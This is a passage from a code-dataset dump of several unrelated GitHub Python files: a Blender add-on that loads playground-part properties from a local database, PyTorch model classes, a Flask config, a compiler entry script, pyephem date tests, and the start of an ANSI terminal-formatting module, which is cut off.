bpy.context.view_layer.objects.active = bpy.data.objects[coluna]\r\n bpy.data.objects[coluna].aqua.derivacao = col_der\r\n bpy.data.objects[coluna].aqua.leitura_derivacao = col_der\r\n\r\n # AJUSTAR FIXACAO\r\n if fix == \"PISO\":\r\n bpy.data.objects[coluna].location.z = 0.0\r\n elif fix == \"TERRA\":\r\n bpy.data.objects[coluna].location.z = -0.1\r\n\r\n # print(\r\n # f\"{torre} FIXACAO:{fix} - PLATAFORMA:{alt_plat} - TOLDO:{cobertura} - ACESSO:{acesso}\"\r\n # )\r\n\r\n\r\ndef furos_colunas():\r\n \"\"\"\r\n Esta função itera sobre os objetos da cena e seleciona e ativa os objetos que têm o nome \"COLUNA MAD PLAST\"\r\n e não estão ocultos na viewport. Em seguida, cria uma lista dos objetos filhos do objeto selecionado, excluindo\r\n certos nomes. A função determina se o objeto selecionado tem mais de um filho e atribui o valor \"COM TAMPA\" à variável\r\n 'tampa' se tiver, caso contrário, atribui o valor \"SEM TAMPA\". Também atribui o valor \"SEM FURO\" à variável 'alt_coluna'\r\n se a coordenada z da localização do objeto for menor que 1, caso contrário, atribui None. A variável 'anc' recebe o\r\n valor 0 se a variável 'fix' for igual a \"PISO\", caso contrário, recebe 10. A função então arredonda a dimensão z do objeto\r\n multiplicada por 100 e atribui o resultado à variável 'tam_col_scene'. Por fim, a função consulta um dicionário\r\n de códigos e descrições de colunas e, se uma descrição correspondente for encontrada com base nos valores de 'tam_col_scene',\r\n 'tampa', 'fix' e 'alt_coluna', o atributo 'aqua.codigo' do objeto é atualizado com o código correspondente, o atributo 'aqua.nome'\r\n do objeto é atualizado com o nome correspondente e informações sobre o código, nome e nome do objeto são impressas.\r\n Após iterar sobre todos os objetos, a função chama a função 'report_furos_coluna' para cada torre em uma lista de torres.\r\n \"\"\"\r\n fix = bpy.context.scene.cena.ancoragem\r\n print(\"COLUNAS:\")\r\n for obj in bpy.context.scene.objects:\r\n if obj.name_full.find(\"COLUNA MAD PLAST\") != -1 and obj.hide_viewport == False:\r\n # SELECIONAR E ATIVAR OBJETO\r\n selecionar_objetos_por_nome(obj.name_full)\r\n\r\n child_col = []\r\n child_col.clear()\r\n child_col = [\r\n chld.name.split(\".\")[0]\r\n for chld in obj.children_recursive\r\n if chld.name.split(\".\")[0]\r\n not in (\r\n \"L PEQUENO GALV\",\r\n \"COQUEIRO M1\",\r\n \"ADICIONAR NA LISTA DE SEPARACAO - SAPATA COQUEIRO E 4 KIT PF L\",\r\n \"ADICIONAR NA LISTA DE SEPARACAO - SAPATA COQUEIRO E 4 KIT \",\r\n )\r\n ]\r\n\r\n tampa = \"COM TAMPA\" if len(child_col) > 1 else \"SEM TAMPA\"\r\n alt_coluna = \"SEM FURO\" if obj.location.z < 1 else None\r\n anc = 0 if fix == \"PISO\" else 10\r\n\r\n # SELECIONAR E ATIVAR OBJETO\r\n selecionar_objetos_por_nome(obj.name_full)\r\n\r\n tam_col_scene = round(obj.dimensions.z * 100)\r\n\r\n for codigo, descricao in query_colunas_furos_avulsas().items():\r\n nome_coluna_ = f\"{obj.name.split(' MAD')[0]} {fix} {tam_col_scene} CM - {alt_coluna} - {tampa}\"\r\n if (\r\n int(descricao[1]) == int(tam_col_scene)\r\n and tampa == descricao[2]\r\n and fix == descricao[3]\r\n and alt_coluna == descricao[4]\r\n ):\r\n obj.aqua.codigo = str(codigo)\r\n obj.aqua.nome = nome_coluna_\r\n print(str(codigo), nome_coluna_, \" -->\", obj.name_full)\r\n\r\n for torre in list(Colecoes().lista_torre_colecoes_cena()):\r\n # for torre in lista_torres():\r\n report_furos_coluna(torre)\r\n\r\n\r\ndef ajustar_todas_torres():\r\n for i in list(Colecoes().lista_torre_colecoes_cena()):\r\n # for i in lista_torres():\r\n ajustar_derivacao_colunas(i)\r\n\r\n\r\ndef update_ancoragem(self, context):\r\n ajustar_todas_torres()\r\n furos_colunas()\r\n pf_novo = \"3003020142_KIT PF TORRE L PEQUENO GALV FOGO PISO\"\r\n pf_novo_acop = \"3003020143_KIT PF TORRE ACOP L PEQUENO GALV FOGO PISO\"\r\n\r\n for obj in bpy.data.objects:\r\n for pf in obj.kit_pf.keys():\r\n if pf.split(\"_\")[0] == \"3003020140\":\r\n for obj in bpy.data.objects[obj.name_full].kit_pf:\r\n obj.name = pf_novo\r\n\r\n elif pf.split(\"_\")[0] == \"3003020141\":\r\n for obj in bpy.data.objects[obj.name_full].kit_pf:\r\n obj.name = pf_novo_acop\r\n\r\n print(f\"Ancoragem alterada para: {bpy.context.scene.cena.ancoragem}\")\r\n\r\n\r\ndef carregar_dados_json(obj):\r\n import ast\r\n\r\n aqua = obj.aqua\r\n nome_aqua = obj.aqua.nome\r\n codigo_aqua = obj.aqua.codigo\r\n nome_gen = os.path.splitext(os.path.basename(nome_aqua))[0]\r\n\r\n pm_db = conexao_banco_local()[0]\r\n\r\n select_props = \"\"\"\r\n SELECT\r\n codigo,\r\n nome,\r\n derivacao_ativa,\r\n kits_pf,\r\n lista_derivacao,\r\n peso,\r\n tipo_derivacao\r\n\r\n FROM\r\n tb_itens\r\n WHERE\r\n codigo = ?\r\n and parametro = 'OBJETO';\r\n \"\"\"\r\n\r\n pm_db.execute(select_props, (codigo_aqua,))\r\n # from icecream import ic\r\n\r\n for info_item in pm_db.fetchall():\r\n aqua.peso = float(info_item[5])\r\n aqua.codigo = str(info_item[0])\r\n aqua.derivaco = info_item[4]\r\n aqua.preco = float(info_item[0])\r\n\r\n # print(aqua.codigo, aqua.peso, aqua.derivacao, f\"R$ {round(float(aqua.preco), 2)}\")\r\n\r\n if aqua.nome != \"COLUNA MAD PLAST 9 X 9CM\":\r\n obj.kit_pf.clear()\r\n with contextlib.suppress(Exception):\r\n for i in ast.literal_eval(info_item[3]):\r\n obj.kit_pf.add().name = i\r\n\r\n tipo = aqua.tipo_derivacao\r\n obj.aqua_cores.clear() # Clear the previous list\r\n\r\n for i in ast.literal_eval(info_item[4]):\r\n obj.aqua_cores.add().name = i\r\n\r\n if aqua.tipo_derivacao == \"05_unica\":\r\n aqua.derivacao = \"05_unica\"\r\n\r\n if aqua.tipo_derivacao == \"10_cores\":\r\n aqua.derivacao = info_item[2]\r\n\r\n if aqua.tipo_derivacao == \"20_tam mad plast\":\r\n aqua.derivacao = (\r\n \"100_270 CM\"\r\n if bpy.context.scene.cena.ancoragem == \"PISO\"\r\n else \"110_280 CM\"\r\n )\r\n val_derivacao = float(aqua.derivacao.split(\"_\")[1].split(\" \")[0])\r\n obj.dimensions.z = val_derivacao / 100\r\n\r\n aqua.leitura_derivacao = aqua.derivacao\r\n\r\n print(\r\n f\"------------------------------------------------- ATUALIZADO - {obj.aqua.nome}\"\r\n )\r\n\r\n\r\ndef carregar_dados_kit_pf_json(obj):\r\n nome_aqua = obj.aqua.nome\r\n nome_gen = os.path.splitext(os.path.basename(nome_aqua))[0]\r\n\r\n # -------------------------------------------------------\r\n # CAMINHO: PEGAR DA OUTRA FUNCAO\r\n data = caminhos_pastas()[1]\r\n # -------------------------------------------------------\r\n\r\n # file = Path(data + nome_aqua + \".txt\")\r\n file = Path(f\"{data}{nome_aqua}.txt\")\r\n\r\n # checar se o arquivo existe\r\n if not os.path.exists(file):\r\n print(f\"caminho arquivo {str(file)} nao existe\")\r\n bpy.ops.object.aviso_prop(\"INVOKE_DEFAULT\")\r\n\r\n else:\r\n with open(file) as json_data:\r\n dados_kit_pf = json.load(json_data)\r\n\r\n for item, key in dados_kit_pf.items():\r\n if item == \"kits_pf\" and obj.aqua.nome != \"COLUNA MAD PLAST 9 X 9CM\":\r\n obj.kit_pf.clear() # LIMPAR LISTA ANTERIOR\r\n for i in dados_kit_pf[item]:\r\n obj.kit_pf.add().name = i\r\n ##\r\n for col in bpy.data.collections:\r\n if (\r\n not col.name.isdigit()\r\n and not col.name.startswith(\"GERAR_VISTAS\")\r\n and col.kit_pf.keys() != []\r\n ):\r\n col.kit_pf.add().name = i\r\n\r\n print(\r\n f\"------------------------------------------------- ATUALIZADO KIT PF - {obj.aqua.nome}\"\r\n )\r\n\r\n\r\ndef carregar_dados_objeto(conjunto_objetos):\r\n for obj in conjunto_objetos:\r\n if obj.aqua.nome != \"\":\r\n selecionar_objetos_por_nome(obj.name_full)\r\n\r\n # bpy.ops.object.select_all(\r\n # action=\"DESELECT\"\r\n # ) # DESLECIONAR QUALQUER OBJETO SELECIONADO\r\n\r\n nome = obj.name_full # NOME OBJETO NO BLENDER\r\n\r\n # SELECIONAR E ATIVAR OBJETO\r\n bpy.context.view_layer.objects.active = bpy.data.objects[nome]\r\n bpy.data.objects[nome].select_set(True)\r\n\r\n if bpy.context.object.name_full.startswith(\"COLUNA MAD PLAST\"):\r\n bpy.ops.objects.ajustar_colunas()\r\n else:\r\n # CARREGAR DADOS DO JSON\r\n carregar_dados_json(obj)\r\n\r\n\r\ndef nomes_colunas():\r\n pm_produtos.execute(\r\n \"\"\"\r\n select\r\n produtos.codpro, produtos.despro\r\n from tb_produtos as produtos\r\n where produtos.codpro like ('240%')\r\n order by produtos.codpro\r\n \"\"\"\r\n )\r\n return [colunas[1] for colunas in pm_produtos.fetchall()]\r\n\r\n\r\ndef carregar_dados_kit_pf_objeto(self, conjunto_objetos):\r\n \"\"\"\r\n Carrega os dados do kit PF de um conjunto de objetos.\r\n\r\n Parameters:\r\n self (objeto): O objeto atual.\r\n conjunto_objetos (lista): Uma lista de objetos.\r\n\r\n Returns:\r\n None\r\n \"\"\"\r\n try:\r\n for obj in conjunto_objetos:\r\n if obj.aqua.nome != \"\" and obj.aqua.nome not in nomes_colunas():\r\n selecionar_objetos_por_nome(obj.name_full)\r\n nome_aqua = obj.aqua.nome\r\n nome_gen = os.path.splitext(os.path.basename(nome_aqua))[0]\r\n\r\n # -------------------------------------------------------\r\n # CAMINHO: PEGAR DA OUTRA FUNCAO\r\n data = caminhos_pastas()[1]\r\n # -------------------------------------------------------\r\n\r\n pm_db = conexao_banco_local()[0]\r\n\r\n select_props = \"\"\"\r\n SELECT\r\n kits_pf\r\n FROM\r\n tb_itens\r\n WHERE\r\n nome = ?\r\n and nome not like ('COLUNA MAD PLAST%')\r\n and parametro = 'OBJETO';\r\n \"\"\"\r\n\r\n pm_db.execute(select_props, (obj.aqua.nome,))\r\n\r\n for info_item in pm_db.fetchall():\r\n obj.kit_pf.clear() # LIMPAR LISTA ANTERIOR\r\n try:\r\n for kit in ast.literal_eval(info_item[0]):\r\n if not obj.name.startswith(\"COLUNA MAD PLAST\"):\r\n obj.kit_pf.add().name = kit\r\n print(f\"ATUALIZADO KIT PF: {obj.aqua.nome}\")\r\n except TypeError as error1:\r\n print(obj.aqua.nome, error1)\r\n\r\n for col in bpy.data.collections:\r\n nome_colecao = col.name_full.split(\".\")[0]\r\n if col.kit_pf.keys() != []:\r\n col.kit_pf.clear()\r\n\r\n pm_db = conexao_banco_local()[0]\r\n\r\n select_props = \"\"\"\r\n SELECT\r\n kits_pf\r\n FROM\r\n tb_itens\r\n WHERE\r\n nome = ?\r\n and parametro = 'COLECAO';\r\n \"\"\"\r\n\r\n pm_db.execute(select_props, (nome_colecao,))\r\n\r\n for info_item in pm_db.fetchall():\r\n try:\r\n for kit_pf in ast.literal_eval(info_item[0]):\r\n col.kit_pf.add().name = kit_pf\r\n except TypeError as error:\r\n print(obj.aqua.nome, error)\r\n except ReferenceError as E:\r\n print(E)\r\n\r\n\r\ndef pasta_cores():\r\n pasta_cores = caminhos_pastas()[2]\r\n padrao = \"*.blend\"\r\n\r\n for path, subdirs, files in os.walk(pasta_cores):\r\n for name in files:\r\n if fnmatch.fnmatch(\r\n name, padrao\r\n ): # Use fnmatch.fnmatch to check the pattern\r\n cor = os.path.splitext(name)[0]\r\n caminho = os.path.join(\r\n pasta_cores, cor + \".blend\", \"Material\"\r\n ) # Use os.path.join for path manipulation\r\n bpy.ops.wm.append(filename=cor, directory=caminho)\r\n\r\n\r\nclasses = ()\r\n\r\n\r\n# Register and add to the \"object\" menu (required to also use F3 search \"Simple Object Operator\" for quick access).\r\ndef register():\r\n from bpy.utils import register_class\r\n\r\n for cls in classes:\r\n register_class(cls)\r\n\r\n\r\ndef unregister():\r\n from bpy.utils import unregister_class\r\n\r\n for cls in reversed(classes):\r\n unregister_class(cls)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n register()\r\n","repo_name":"igor-amaral-projetos/aquarela-playground-creator","sub_path":"SCRIPTS_PM/funcoes/aqua_obj_props.py","file_name":"aqua_obj_props.py","file_ext":"py","file_size_in_byte":26905,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28138865357","text":"\"\"\"ptutils model.py.\n\nEncapsulates a neural network model, criterion and optimizer.\n\n\"\"\"\nimport random\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch.nn.parallel import data_parallel\n\nfrom ptutils.base import Base\n\n\nclass Model(Base):\n\n def __init__(self,\n net=None,\n criterion=None,\n optimizer=None,\n **kwargs):\n super(Model, self).__init__(**kwargs)\n\n self.net = net\n self.criterion = criterion\n self.optimizer = optimizer\n if self.optimizer.params is None:\n params = self.net.parameters()\n if hasattr(self.optimizer, 'defaults'):\n self.optimizer.optimizer = self.optimizer.optimizer_class(params,\n **self.optimizer.defaults)\n else:\n self.optimizer.optimizer = self.optimizer.optimizer_class(params)\n self._loss = None\n if self.use_cuda:\n self.net.cuda(self.devices)\n\n# @property\n# def optimizer(self):\n# return self._optimizer\n#\n# @optimizer.setter\n# def optimizer(self, value):\n# self._optimizer = value\n# if self._optimizer.params == None:\n# params = self.net.parameters()\n# if hasattr(self._optimizer, 'defaults'):\n# self._optimizer.optimizer = self._optimizer.optimizer_class(params,\n# **self._optimizer.defaults)\n# else:\n# self._optimizer.optimizer = self._optimizer.optimizer_class(params)\n#\n\n def forward(self, input):\n input_var = Variable(input)\n input_var = input_var.cuda(self.devices) if self.use_cuda else input_var\n return self.net(input_var)\n\n def loss(self, output, target):\n target_var = Variable(target)\n target_var = target_var.cuda(self.devices) if self.use_cuda else target_var\n loss = self.criterion(output, target_var)\n return loss\n\n def compute_gradients(self, loss=None):\n loss.backward()\n\n def apply_gradients(self):\n self.optimizer.step()\n\n def eval(self):\n \"\"\"Set up model for evaluation.\"\"\"\n self.net.eval()\n\n def train(self):\n \"\"\"Set up model for training.\"\"\"\n self.net.train()\n\n def optimize(self, loss=None):\n self.compute_gradients(loss=loss)\n self.apply_gradients()\n self.optimizer.zero_grad()\n\n def step(self, inputs):\n input, target = inputs\n output = self.forward(input)\n self._loss = self.loss(output, target)\n self.optimize(self._loss)\n return {'loss': self._loss}\n\n\nclass MNISTModel(Model):\n\n def __init__(self, *args, **kwargs):\n super(MNISTModel, self).__init__(*args, **kwargs)\n self.net = MNIST()\n self.learning_rate = 1e-3\n self.criterion = nn.CrossEntropyLoss()\n self.optimizer = optim.Adam(self.net.parameters(), self.learning_rate)\n\n\nclass MNIST(nn.Module, Base):\n\n def __init__(self):\n super(MNIST, self).__init__()\n\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 16, kernel_size=5, padding=2),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.MaxPool2d(2))\n self.layer2 = nn.Sequential(\n nn.Conv2d(16, 32, kernel_size=5, padding=2),\n nn.BatchNorm2d(32),\n nn.ReLU(),\n nn.MaxPool2d(2))\n self.fc = nn.Linear(7 * 7 * 32, 10)\n\n self.cuda(self.devices)\n\n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = out.view(out.size(0), -1)\n out = self.fc(out)\n return out\n\n\nclass ConvMNIST(nn.Module, Base):\n def __init__(self):\n super(ConvMNIST, self).__init__()\n\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 16, kernel_size=5, padding=2),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.MaxPool2d(2))\n self.layer2 = nn.Sequential(\n nn.Conv2d(16, 32, kernel_size=5, padding=2),\n nn.BatchNorm2d(32),\n nn.ReLU(),\n nn.MaxPool2d(2))\n\n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = out.view(out.size(0), -1)\n return out\n\n\nclass FcMNIST(nn.Module, Base):\n\n def __init__(self):\n super(FcMNIST, self).__init__()\n self.fc = nn.Linear(7 * 7 * 32, 10)\n\n def forward(self, x):\n return self.fc(x)\n\n\nclass DynamicNet(nn.Module):\n def __init__(self, D_in, H, D_out):\n super(DynamicNet, self).__init__()\n self.input_linear = torch.nn.Linear(D_in, H)\n self.middle_linear = torch.nn.Linear(H, H)\n self.output_linear = torch.nn.Linear(H, D_out)\n\n def forward(self, x):\n h_relu = self.input_linear(x).clamp(min=0)\n for _ in range(random.randint(0, 3)):\n h_relu = self.middle_linear(h_relu).clamp(min=0)\n y_pred = self.output_linear(h_relu)\n return y_pred\n\n\nclass AlexNet(nn.Module):\n\n def __init__(self, num_classes=10):\n super(AlexNet, self).__init__()\n self.num_classes = num_classes\n\n self.features = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=11, stride=4, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(64, 192, kernel_size=5, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(192, 384, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 256, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(256, 256, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n )\n self.classifier = nn.Sequential(\n nn.Dropout(),\n nn.Linear(256 * 6 * 6, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(inplace=True),\n nn.Linear(4096, self.num_classes),\n )\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), 256 * 6 * 6)\n x = self.classifier(x)\n return x\n\n\nclass CIFARConv(nn.Module):\n\n def __init__(self, num_classes=10):\n super(CIFARConv, self).__init__()\n self.num_classes = num_classes\n\n self.features = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=5, padding=2),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(2),\n nn.Conv2d(64, 192, kernel_size=5, padding=2),\n nn.BatchNorm2d(192),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(2),\n nn.Conv2d(192, 384, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 256, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(256, 256, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(2),\n )\n self.classifier = nn.Sequential(\n nn.Dropout(),\n nn.Linear(256 * 4 * 4, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(inplace=True),\n nn.Linear(4096, num_classes),\n )\n\n def reset_classifier(self, num_classes=10):\n self.classifier[6] = nn.Linear(4096, num_classes)\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), 256 * 4 * 4)\n x = self.classifier(x)\n return x\n\n\nclass CIFARConvOld(nn.Module):\n def __init__(self, num_classes=10):\n super(CIFARConv, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(3, 16, kernel_size=5, padding=2),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.MaxPool2d(2))\n self.layer2 = nn.Sequential(\n nn.Conv2d(16, 20, kernel_size=5, padding=2),\n nn.BatchNorm2d(20),\n nn.ReLU(),\n nn.MaxPool2d(2))\n self.layer3 = nn.Sequential(\n nn.Conv2d(20, 20, kernel_size=5, padding=2),\n nn.BatchNorm2d(20),\n nn.ReLU(),\n nn.MaxPool2d(2))\n self.fc = nn.Linear(4 * 4 * 20, num_classes)\n\n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = self.layer3(out)\n out = out.view(out.size(0), -1)\n out = self.fc(out)\n return out\n\n def re_init_fc(self, num_classes=10):\n self.fc = nn.Linear(4 * 4 * 20, num_classes)\n","repo_name":"neuroailab/ptutils","sub_path":"ptutils/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8674,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"44013921874","text":"#Archivo de configuracion\n\nimport os\n\n#Creamos una clase que tiene las configuraciones generales\n#Hereda de object, para que sea instanciable\nclass Config(object):\n #Aquí como son constantes, son con palabras en mayuscula\n PORT = 5000\n \n#Ahora, podemos crear clases hijo para los diferentes entornos\n\nclass DevelopmentConfig(Config):\n PORT = 9000\n DEBUG = True\n\n\n\n","repo_name":"hek23/FlaskTutorialExample","sub_path":"Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40695884800","text":"import sys, getopt\nfrom controller import *\ndef main(argv):\n inputfile = ''\n outputfile = ''\n data = ''\n try:\n opts, args = getopt.getopt(argv,\"hi:o:\",[\"ifile=\",\"ofile=\"])\n except getopt.GetoptError:\n print ('main.py -i -o ')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print ('test.py -i -o ')\n sys.exit()\n elif opt in (\"-i\", \"--ifile\"):\n inputfile = arg\n elif opt in (\"-o\", \"--ofile\"):\n outputfile = arg\n\n with open(\"tests/\" + inputfile, \"r\") as input_file:\n text = input_file.read()\n data = start(text)\n pass\n\n with open(\"out/\" + outputfile, \"w\") as output_file:\n # write result to output file.\n # for the sake of testing :\n output_file.write(data)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])","repo_name":"hassanzaker/decaf-compiler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3291835516","text":"file = open('24-2.txt')\ndata = file.read()\ncount = 0\nmaxc = 0\nfor i in data:\n if i in 'ACD':\n count += 1\n continue\n if maxc < count:\n maxc = count\n count = 0\nprint('', maxc)\n","repo_name":"olgaObnosova/EGE","sub_path":"№24/2516.py","file_name":"2516.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13813006557","text":"#!/usr/bin/env python\n\nimport unittest, time\nfrom datetime import datetime, tzinfo, timedelta\n\nfrom ephem import Date, localtime, to_timezone, UTC\n\nmillisecond = 1.0 / 24.0 / 60.0 / 60.0 / 1e3\n\nclass CET(tzinfo):\n \"\"\"central european time without daylight saving time\"\"\"\n def utcoffset(self, dt):\n return timedelta(hours=1) + self.dst(dt)\n def dst(self, dt):\n return timedelta(0)\n\n# Determine whether dates behave reasonably.\n\nclass DateTests(unittest.TestCase):\n\n def setUp(self):\n self.date = Date('2004/09/04 00:17:15.8')\n\n def test_date_constructor(self):\n\n def construct_and_compare(args1, args2):\n d1, d2 = Date(args1), Date(args2)\n self.assertTrue(abs(d1 - d2) < millisecond,\n 'dates not equal:\\n %r = date%r\\n %r = date%r'\n % (d1.tuple(), args1, d2.tuple(), args2))\n\n std = '2004/09/04 00:17:15.8'\n pairs = [\n [std, '2004.67489614324023472'],\n [std, ' 2004.67489614324023472 '],\n [std, '2004/9/4.0119884259259257'],\n [std, ' 2004/9/4.0119884259259257 '],\n [std, '2004/9/4 0.28772222222222221'],\n [std, ' 2004/9/4 0.28772222222222221 '],\n [std, '2004/9/4 0:17.263333333333332'],\n [std, ' 2004/9/4 0:17.263333333333332 '],\n [std, '2004/9/4 0:17:15.8'],\n [std, ' 2004/9/4 0:17:15.8 '],\n [std, ' 2004-9-4 0:17:15.8 '],\n ['2004', (2004,)],\n [' 2004 ', (2004,)],\n ['2004/09', (2004, 9)],\n [' 2004/09 ', (2004, 9)],\n [std, (2004, 9, 4.0119884259259257)],\n [std, (2004, 9, 4, 0.28772222222222221)],\n [std, (2004, 9, 4, 0, 17.263333333333332)],\n [std, (2004, 9, 4, 0, 17, 15.8)],\n [std, (datetime(2004, 9, 4, 0, 17, 15, 800000))],\n ]\n for arg1, arg2 in pairs:\n construct_and_compare(arg1, arg2)\n if type(arg2) is str:\n construct_and_compare(arg1, ' %s ' % arg2)\n\n def test_date_parser_error_message(self):\n with self.assertRaises(ValueError) as e:\n Date('bad string')\n self.assertEqual(\n str(e.exception),\n \"your date string 'bad string' does\"\n \" not look like a year/month/day optionally\"\n \" followed by hours:minutes:seconds\",\n )\n\n def test_year_zero(self):\n # I would have thought the year would be 0, but it looks like\n # libastro considers 1 BC to be the year -1?\n self.assertEqual(str(Date('0')), '-1/1/1 00:00:00')\n\n def test_date_string_value(self):\n self.assertEqual(str(self.date), '2004/9/4 00:17:16')\n\n def test_date_triple_value(self):\n self.assertEqual(self.date.triple(), (2004, 9, 4.0119884259256651))\n\n def test_date_tuple_value(self):\n self.assertEqual(self.date.tuple(),\n (2004, 9, 4, 0, 17, 15.8))\n\n def test_another_tuple_value(self):\n #d = Date((1994, 7, 16, 20, 15, 0))\n d = Date(34530.34375)\n self.assertEqual(d.tuple(), (1994, 7, 16, 20, 15, 0))\n\n def test_tuple_that_rounded_to_negative_seconds(self): # Github issue 223\n d = Date(44417.49999991596)\n self.assertEqual(d.tuple(), (2021, 8, 10, 23, 59, 59.992739))\n\n def test_localtime_modern(self):\n if time.timezone == 18000: # test only works in Eastern time zone\n self.assertEqual(localtime(Date('2009/6/23 8:47')),\n datetime(2009, 6, 23, 4, 47, 0))\n\n def test_timezone_aware_utc(self):\n timezoned_date = to_timezone(self.date, UTC)\n self.assertEqual(timezoned_date.tzinfo, UTC)\n self.assertEqual(timezoned_date.hour, 0)\n self.assertEqual(timezoned_date.minute, 17)\n self.assertEqual(timezoned_date.second, 15)\n self.assertEqual(timezoned_date.day, 4)\n self.assertEqual(timezoned_date.month, 9)\n self.assertEqual(timezoned_date.year, 2004)\n\n def test_timezone_aware_cet(self):\n cet = CET()\n timezoned_date = to_timezone(self.date, cet)\n self.assertEqual(timezoned_date.tzinfo, cet)\n self.assertEqual(timezoned_date.hour, 1)\n self.assertEqual(timezoned_date.minute, 17)\n self.assertEqual(timezoned_date.second, 15)\n self.assertEqual(timezoned_date.day, 4)\n self.assertEqual(timezoned_date.month, 9)\n self.assertEqual(timezoned_date.year, 2004)\n\n # I am commenting this out for now because I am not sure that I can\n # fix it without either writing an entirely new time module for\n # PyEphem, or making PyEphem depend on another Python module - which\n # would be its first-ever external dependency.\n\n def OFF_test_localtime_premodern(self):\n if time.timezone == 18000: # test only works in Eastern time zone\n self.assertEqual(localtime(Date('1531/8/24 2:49')),\n datetime(1957, 10, 4, 15, 28, 34, 4))\n","repo_name":"brandon-rhodes/pyephem","sub_path":"ephem/tests/test_dates.py","file_name":"test_dates.py","file_ext":"py","file_size_in_byte":5029,"program_lang":"python","lang":"en","doc_type":"code","stars":671,"dataset":"github-code","pt":"72"} +{"seq_id":"30589283110","text":"#!/usr/bin/env python\n\n# Not working yet!\n\nfrom __future__ import print_function\n\n\n_ESCAPE = '\\033[{}m'\n\n_CODES = {\n 'tuple': {\n 'special': {\n 'all_reset': '0',\n 'overwrite_line': 'F',\n },\n 'style': {\n 'bold': '1',\n 'faint': '2',\n 'highlight': '3',\n 'underline': '4',\n 'blink_slow': '5',\n 'blink_rapid': '6',\n 'negative': '7',\n 'conceal': '8',\n 'crossed-out': '9',\n # fonts not implemented (10--20)\n 'nobold': '21',\n 'normalcolor': '22',\n 'noitalic': '23',\n 'nounderline': '24',\n 'noblink': '25',\n 'positive': '27',\n 'noconceal': '28',\n 'nocrossed-out': '29',\n 'framed': '51',\n 'encircled': '52',\n 'overlined': '53',\n 'noframe': '54',\n 'nooverline': '55',\n },\n },\n 'string': {\n 'fg': {\n 'black': '30',\n 'red': '31',\n 'green': '32',\n 'yellow': '33',\n 'blue': '34',\n 'magenta': '35',\n 'cyan': '36',\n 'white': '37',\n 'default': '39',\n },\n 'bg': {\n 'black': '40',\n 'red': '41',\n 'green': '42',\n 'yellow': '43',\n 'blue': '44',\n 'magenta': '45',\n 'cyan': '46',\n 'white': '47',\n 'default': '49',\n },\n },\n 'int': {\n 'bg256': '48;5',\n 'fg256': '38;5',\n }\n }\n\n# rename default Python `print` to `_print`\n_print = print\n\ndef format(string, **kwargs):\n ''' Return a string wrapped between the ANSI codes implementing the format\n passed as arguments. '''\n codes = []\n for kwd,val in kwargs.items():\n if kwd in _CODES['tuple'].keys():\n if isinstance(val, str):\n codes.append(_CODES['tuple'][kwd][val])\n else:\n for v in val:\n codes.append(_CODES['tuple'][kwd][v])\n elif kwd in _CODES['string'].keys():\n codes.append(_CODES['string'][kwd][val])\n elif kwd in _CODES['int'].keys():\n codes.append('{};{}'.format(_CODES['int'][kwd], val))\n else:\n raise ValueError('Bad option')\n return '{}{}{}'.format(\n _ESCAPE.format(';'.join(codes)),\n string,\n _ESCAPE.format(_CODES['tuple']['special']['all_reset']),\n )\n\ndef print(*args, **kwargs):\n ''' Call ansi_format and print its output. '''\n ansi_kwargs = {}\n print_kwargs = {}\n for k,v in kwargs.items():\n if k in _CODES['tuple'].keys() \\\n or k in _CODES['string'].keys() \\\n or k in ['bg256', 'fg256']: # qnd\n ansi_kwargs.update({k:v})\n else:\n print_kwargs.update({k:v})\n print_args = []\n for arg in args:\n print_args.append(format(arg, **ansi_kwargs))\n _print(*print_args, 